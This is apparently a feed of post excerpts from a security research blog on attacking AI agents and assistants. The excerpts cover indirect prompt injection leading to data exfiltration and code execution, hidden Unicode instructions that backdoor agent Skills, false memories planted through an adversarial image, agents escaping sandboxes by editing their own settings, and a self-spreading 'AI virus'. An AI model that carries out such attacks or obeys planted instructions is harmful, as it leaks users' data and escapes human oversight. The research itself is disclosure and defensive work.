Embrace The Red

Autonomous AI Intrusions Are Here: Lessons from the Hugging Face Compromise

Embrace The Red

1 week 1 day ago

Hugging Face disclosed an intrusion that, according to them, was driven end to end by an autonomous AI agent system.

Along similar lines, Sysdig recently published a blog on JADEPUFFER, which it assesses to be an agent-driven ransomware capable of adapting in real time. The report does not identify the victim or fully explain how Sysdig obtained visibility into the operation.

The Hugging Face disclosure highlights three important things: autonomous AI intrusion, defensive asymmetry, and missing IOCs.

From Indirect Prompt Injection to DNS Exfiltration in macOS Terminal

Embrace The Red

1 week 5 days ago

This is a follow-up to my previous Terminal DiLLMa research, and there is a positive outcome: Apple fixed a macOS Terminal behavior that enabled a DNS-based data exfiltration technique.

DNS Requests via ANSI Escape Codes

David Leadbeater originally discovered an interesting behavior in the macOS Terminal app that allowed a special sequence of ANSI escape codes to issue DNS requests.

In short, this triggered a DNS request from the macOS Terminal app:

Computer-Use and TOCTOU: What You Click Is Not What You Get!

Embrace The Red

1 month ago

Last year, Jun Kokatsu disclosed an interesting vulnerability with ChatGPT Operator by exploiting a race condition. I was wondering if I could reproduce this attack chain, and this post describes the results of that research.

I had this post drafted for months, and yesterday at the Real-world AI security conference I included a video demo of this attack in my talk and that reminded me that I should finally publish this.

Copirate 365 at DEF CON: Plundering in the Depths of Microsoft Copilot (CVE-2026-24299)

Embrace The Red

2 months 3 weeks ago

This is a writeup of my DEF CON Singapore talk that walks through vulnerabilities and exploits in M365 Copilot and Consumer Copilot. I disclosed these to Microsoft last year. MSRC assigned CVE-2026-24299 and the issues are now patched.

Contents

This turned out to be a long post, covering the 45 minute talk. I added an index page, so you know what’s in here. The talk had a more demos by the way, but I included videos here in this post also.

Breaking Opus 4.7 with ChatGPT (Hacking Claude's Memory)

Embrace The Red

3 months 1 week ago

In this post, we explore how ChatGPT generated an adversarial image that hijacked my Claude Opus 4.7 to invoke the memory tool and persist false memories for future chats.

This matters because Opus 4.6+ is genuinely a lot harder to attack than previous models, but it still fell for a ChatGPT generated image. A trick that works well with reasoning models is to challenge them with puzzles.

Indirect Prompt Injection and Alignment Progress

Claude Opus 4.6+ is more resilient against basic attacks, and reasons before taking actions. This means that most of the well-known, basic adversarial examples and attacks typically do not work.

Given Enough Agents, All Bugs Become Shallow

Embrace The Red

3 months 2 weeks ago

Agents are becoming extremely effective at finding security vulnerabilities. They are relentless in analyzing code and you can spin up multiple of them to go through source code quickly.

given enough agents, all bugs are shallow

— Johann Rehberger (@wunderwuzzi23) February 10, 2026

It is an emerging capability that many security researchers and bug bounty hunters have observed over the last year.

Gadi Evron posted about the upcoming AI Vulnerability Cataclysm last year to help raise awareness.

Agent Commander: Promptware-Powered Command and Control

Embrace The Red

4 months 1 week ago

This post is about prompt-based command and control (C2), which is becoming more relevant.

What is Promptware-Powered C2?

Three years ago, when ChatGPT introduced the browsing tool, we already experimented with the idea of prompt-based command and control. And when ChatGPT got memories we showed that this can be combined and abused for a full command and control channel.

Recent work uses the term promptware to describe prompt-injection payloads that are more complex in behavior and closer to malware. I’m using that term here as it fits well.

Scary Agent Skills: Hidden Unicode Instructions in Skills ...And How To Catch Them

Embrace The Red

5 months 2 weeks ago

There is a lot of talk about Skills recently, both in terms of capabilities and security concerns. However, so far I haven’t seen anyone bring up hidden prompt injection. So, I figured to demo a Skills supply chain backdoor that survives human review.

Additionally, I also built a basic scanner, and had my agent propose updates to OpenClaw to catch such attacks.

Attack Surface

Skills introduce common threats, like prompt injection, supply chain attacks, RCE, data exfiltration,… This post discusses some basics, highlights the most simple prompt injection avenue, and shows how one can backdoor a real Skill from OpenAI with invisible Unicode Tag codepoints that certain models, like Gemini, Claude, Grok are known to interpret as instructions.

OpenAI Explains URL-Based Data Exfiltration Mitigations in New Paper

Embrace The Red

5 months 3 weeks ago

Last week I saw this paper from OpenAI called “Preventing URL-Based Data Exfiltration in Language-Model Agents”, which goes into detail on new mitigations they’ve added.

This is a great read. I like this transparency.

Initial Disclosure in 2023

Nearly three years ago I reported the zero-click data exfiltration exploit to OpenAI. Back in early 2023 OpenAI did not have a bug bounty program, so communication was via email, and unfortunately there was little traction or appetite to fix the problem in ChatGPT. I also reported the same issue to Microsoft as Bing Chat was impacted, and Microsoft applied a fix (via a Content-Security-Policy header) in May 2023 to generally prevent loading of images.

Minting Next.js Authentication Cookies

Embrace The Red

6 months 1 week ago

In this post, we’ll look how an adversary can mint authentication cookies for Next.js (next-auth/Auth.js) applications to maintain persistent access to the application as any user.

The reason this is important is because of React2Shell, which is a deserialization vulnerability that allows an adversary to run arbitrary code. Much has been discussed about this vulnerability, and you can read up the original details from the finder here.

Agentic ProbLLMs: Exploiting AI Computer-Use And Coding Agents (39C3 Video + Slides)

Embrace The Red

6 months 4 weeks ago

It was great to attend the 39C3 - Power Cycles in Hamburg this year. The Chaos Communication Congress was once again packed with great talks, amazing people, awesome events and side quests - and I even got to present!

You can watch the talk with translation options on media.ccc.de.

I also uploaded the English version to the Embrace The Red YouTube channel. I hope it’s interesting and helpful.

The talk is titled “Agentic ProbLLMs: Exploiting AI Computer-Use and Coding Agents” and is about my security research on vulnerabilities in agentic systems and the Month of AI Bugs with lots of demos.

The Normalization of Deviance in AI

Embrace The Red

7 months 3 weeks ago

The AI industry risks repeating the same cultural failures that contributed to the Space Shuttle Challenger disaster: Quietly normalizing warning signs while progress marches forward.

The original term Normalization of Deviance comes from the American sociologist Diane Vaughan, who describes it as the process in which deviance from correct or proper behavior or rule becomes culturally normalized.

I use the term Normalization of Deviance in AI to describe the gradual and systemic over-reliance on LLM outputs, especially in agentic systems.

Antigravity Grounded! Security Vulnerabilities in Google's Latest IDE

Embrace The Red

8 months ago

Last week Google released an IDE called Antigravity. It’s basically the outcome of the Windsurf licensing deal from a few months ago, where Google paid some $2.4 billion for a non-exclusive license to the code.

Because it’s based on Windsurf, I was curious if vulnerabilities that I reported to Windsurf back in May 2025, long before the deal, would have been addressed in the Antigravity IDE. See Month of AI Bugs for some detailed write-ups.

Claude Pirate: Abusing Anthropic's File API For Data Exfiltration

Embrace The Red

9 months ago

Recently, Anthropic added the capability for Claude’s Code Interpreter to perform network requests. This is obviously very dangerous as we will see in this post.

At a high level, this post is about a data exfiltration attack chain, where an adversary (either the model or third-party attacker via indirect prompt injection) can exfiltrate data the user has access to.

The interesting part is that this is not via hyperlink rendering as we often see, but by leveraging the built-in Anthropic Claude APIs!

Cross-Agent Privilege Escalation: When Agents Free Each Other

Embrace The Red

10 months ago

During the Month of AI Bugs, I described an emerging vulnerability pattern that shows how commonly agentic systems have a design flaw that allows an agent to overwrite its own configuration and security settings.

This allows the agent to break out of its sandbox and escape by executing arbitrary code.

My research with GitHub Copilot, AWS Kiro and a few others demonstrated how this can be exploited by an adversary with an indirect prompt injection.

Wrap Up: The Month of AI Bugs

Embrace The Red

10 months 4 weeks ago

That’s it.

The Month of AI Bugs is done. There won’t be a post tomorrow, because I will be at PAX West.

Overview of Posts

ChatGPT: Exfiltrating Your Chat History and Memories With Prompt Injection | Video
ChatGPT Codex: Turning ChatGPT Codex Into a ZombAI Agent | Video
Anthropic Filesystem MCP Server: Directory Access Bypass Via Improper Path Validation | Video
Cursor: Arbitrary Data Exfiltration via Mermaid | Video
Amp Code: Arbitrary Command Execution via Prompt Injection | Video
Devin AI: I Spent $500 To Test Devin For Prompt Injection So That You Don’t Have To
Devin AI: How Devin AI Can Leak Your Secrets via Multiple Means
Devin AI: The AI Kill Chain in Action: Exposing Ports to the Internet via Prompt Injection
OpenHands - The Lethal Trifecta Strikes Again: How Prompt Injection Can Leak Access Tokens
OpenHands: Remote Code Execution and AI ClickFix Demo | Video
Claude Code: Data Exfiltration with DNS Requests (CVE-2025-55284) | Video
GitHub Copilot: Remote Code Execution (CVE-2025-53773) | Video
Google Jules: Vulnerable to Multiple Data Exfiltration Issues
Google Jules - Zombie Agent: From Prompt Injection to Remote Control
Google Jules: Vulnerable To Invisible Prompt Injection
Amp Code: Invisible Prompt Injection Vulnerability Fixed
Amp Code: Data Exfiltration via Image Rendering Fixed | Video
Amazon Q Developer: Secrets Leaked via DNS and Prompt Injection | Video
Amazon Q Developer: Remote Code Execution via Prompt Injection | Video
Amazon Q Developer: Vulnerable to Invisible Prompt Injection | Video
Windsurf: Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets | Video
Windsurf: Memory-Persistent Data Exfiltration - SpAIware Exploit
Windsurf: Sneaking Invisible Instructions by Developers
Deep Research Agents: How Deep Research Agents Can Leak Your Data
Manus: How Prompt Injection Hijacks Manus to Expose VS Code Server to the Internet | Video
AWS Kiro: Arbitrary Code Execution via Indirect Prompt Injection | Video
Cline: Vulnerable to Data Exfiltration and How to Protect Your Data | Video
Windsurf MCP Integration: Missing Security Controls Put Users at Risk | Video
Season Finale: AgentHopper: An AI Virus Research Project Demonstration | Video

Thank you for following this research, and I hope it serves as a useful reference.

AgentHopper: An AI Virus

Embrace The Red

10 months 4 weeks ago

As part of the Month of AI Bugs, serious vulnerabilities that allow remote code execution via indirect prompt injection were discovered. There was a period of a few weeks where multiple arbitrary code execution vulnerabilities existed in popular agents, like GitHub Copilot, Amazon Q, AWS Kiro,…

During that time I was wondering if it would be possible to write an AI virus.

Hence the idea of AgentHopper was born.

Windsurf MCP Integration: Missing Security Controls Put Users at Risk

Embrace The Red

11 months ago

Part of my default test cases for coding agents is to check how MCP integration looks like, especially if the agent can be configured to allow setting fine-grained controls for tools.

Sometimes there are basic security controls missing.

Especially when running an agent on your local computer. Stakes are much higher. And it seems important to empower users to be able to configure which actions an AI should be able to take automatically, and which ones should be suggestions that the user reviews before executing.

Cline: Vulnerable To Data Exfiltration And How To Protect Your Data

Embrace The Red

11 months ago

Cline is quite a popular AI coding agent, according to the product website it has 2+ million downloads and over 47k stars on GitHub.

Unfortunately, Cline is vulnerable to data exfiltration through the rendering of markdown images from untrusted domains in the chat box.

This allows an adversary to exfiltrate sensitive user information during a prompt injection attack by reading sensitive data (e.g. .env file) and appending its contents to the URL of an image.

AWS Kiro: Arbitrary Code Execution via Indirect Prompt Injection

Embrace The Red

11 months ago

On the day AWS Kiro was released, I couldn’t resist putting it through some of my Month of AI Bugs security tests for coding agents.

AWS Kiro was vulnerable to arbitrary command execution via indirect prompt injection. This means that a remote attacker, who controls data that Kiro processes, could hijack it to run arbitrary operating system commands or write and run custom code.

In particular two attack paths that enabled this with AWS Kiro were identified:

Checked

11 hours 18 minutes ago

Recent content on Embrace The Red

URL

https://embracethered.com/blog/

Embrace The Red feed